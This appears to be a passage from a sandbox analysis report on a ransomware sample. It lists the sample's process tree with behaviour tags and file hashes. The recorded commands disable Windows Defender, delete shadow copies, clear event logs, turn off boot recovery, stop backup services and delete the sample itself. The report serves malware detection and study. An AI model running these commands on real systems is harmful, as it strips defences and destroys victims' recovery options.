C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1304
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1216
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:596
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:712
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:536
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1860
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2920
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2072
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1808
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:852
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1748
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:444
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1708
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1492
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2828
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:580
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1064
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1312
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2960
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2568
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2376
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2288
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1648
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1604
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2212
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1792
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1288
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2024
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2200
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1924
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:556
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2688
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2788
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1600
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1764
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1032
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:2332
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:3024
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2908
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2820
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2744
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2292
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2424
-
-
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1456
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\K8zJ_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1280
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"2⤵
- Deletes itself
PID:1384 -
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2500
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y1⤵PID:2732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y1⤵PID:2828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2720
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y1⤵PID:2748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y1⤵PID:2672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y1⤵PID:2764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3064
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All1⤵
- Deletes Windows Defender Definitions
PID:1728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y1⤵PID:2824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y1⤵PID:2676
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ExportRepair.ini1⤵
- Opens file in notepad (likely ransom note)
PID:3036
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\OpenExit.xsl.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_m7_htIj8dQY0.2o4xo1⤵
- Modifies registry class
PID:1988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f939d786e1fb30d287357d553719cf88
SHA1b5001e66047bb37310e8b9c78fef2d1ef6443e1f
SHA2565f3f1382a950d3c94afafb319c58b2b3731bce694966973685aad6bf9b156cad
SHA5128da927a8e9425e10a29daeb4b93f66484eca789805dd66a29bfee52b59c2a6df9895bc5dfd814eca788ed27b53463cdd4e8983ff2fc04496d5998a4193f3c2a9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD597714a00624079e4bbc5974dafa2b122
SHA12fb9e15aa796be0f47285f737564c96de5e5b8c7
SHA256e3158db42edd5681069d413db3fff20f5a00fe8ed4980ff79365ab75e85820ca
SHA5121dc3023ca7a22ad322e07c96d769c72645dc18cfb0f51315efce9351d698040114e4dbef21128d5e5a8f6843bc92439935f121fc2aef87669252cd5878b0e6ec
-
Filesize
727.0MB
MD5709fb414f4c6fe22490e6e3eeb540405
SHA1bdc7eae6941bf8c8d5dded335e4b987ad7be27d7
SHA256452df20968922ccf4abcf62ed60f2b9ffb3fe1aa5677010e348073e8ed7c3200
SHA512319d6be5e6e14d895b7ed991ac0f52b26652581a3bb690225d220814615e9dd0ece2273ab56b20fe7f25abb31bac1fa4c1bb474d0ed664b377b932c3c62f624e